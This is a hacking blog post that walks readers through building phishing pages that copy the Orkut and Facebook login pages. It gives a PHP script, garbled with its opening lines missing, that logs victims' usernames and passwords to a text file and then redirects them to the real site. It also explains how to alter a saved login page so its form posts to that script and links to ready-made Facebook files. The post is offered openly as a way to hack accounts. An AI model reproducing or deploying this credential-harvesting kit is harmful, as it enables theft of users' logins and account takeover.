In today's post, i am showing you how to create a fake web page manually.
You may have heard about phishing attack.To perform that attack, you must be expert in creating phishing page which i will show you in today's post.Fake n phishing page is the same thing.
Well, to make a phishing page or you can say phisher for any site say orkut, facebook, twitter etc. is very simple task... If you dont know any computer languages then also you can create ur own fake pages very easily.... Just you need some learning capability and a little brain ;)
Basically how a Hacker get passwords using fake page or how phishing works:
For hacking using phishing method, hacker needs 2 type of files
1. index.html
2. A php file with any name say login.php
where index.html is actually a fake login page of any site that looks exactly same as the original login page on that site.....
As soon as victim enter's its username and passwords.... on fake page... it redirects to a php file created by hacker....This php file places main role to get the passwords of victim....it makes a text file and save the victim's username and password in that....also it redirects to the original login page of that site.... so that victim could not know about this hack..
Have a look on actual scene behind phishing attack...click here
To know how to create both files.....Follow the simple steps:
>> In this tut i will tell you first how to create a login.php file, then i will tell you the procedure to make a index.html file.
>> you have to follow same procedure for all the sites.... here just to explain you, in the whole tut i will take an example of orkut.com
Step 1. Creating a login.php file>
Open notepad and paste the following lines there... as save it with name login.php
$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
here:
http://www.orkut.com : its the url of page where the php page will redirect.... that will display to victim... after entering the username and password... you have to change it according to the site for which you are making phishing page.
log.txt : Its the name of file where the passwords will save.
step 2. Create the fake index.html Page:
2.1. first of all open the site for which you want to make a phishing page, say orkut.com..... go to orkut login page.... then right click there> save as> then save it....
check the downloaded file.... there will be one htm file(orkut-login.htm) with a folder(orkut-login_files) containing some pics, css files and js files.
2.2. Now open the htm file with notepad... and press ctrl +F and search for action... and you will find a line as shown in screenshot.
Note:in case of some other sites may be you find more then one action word... but you have to find out the exact type of line as shown in screen shot.... near which you will find a
tag and method="post" something like that.
2.3. Now replace the url written after action with the name of your php file created in step 1. also clear the line onsubmit=".." if it exists.
Now your fake page is ready....
Save it with name index.html
You may download index.html & login.php files directly for facebook page.
Download index.html
Download login.php
As ziddu doesn't allow .html n .php extension so i have uploaded both files in .txt
Change their extensions as index.html & login.php
Note: Along with uploading these 2 files mentioned above... in same directory you have to make one folder with same name as a folder was download in step 2.1 with the htm file...
also you have to upload all files containing that folder in this new folder.
So, now you should know creating phishing page :)
For phishing attack, rest steps are simple which i will write in coming posts.till that get ready with the website you wants to hack :)
thats all for now!!!
Have a good day :)
Take Care
C@ndy
A Trojan Freak: To Download this post as pdf, Click the Download. Tweet
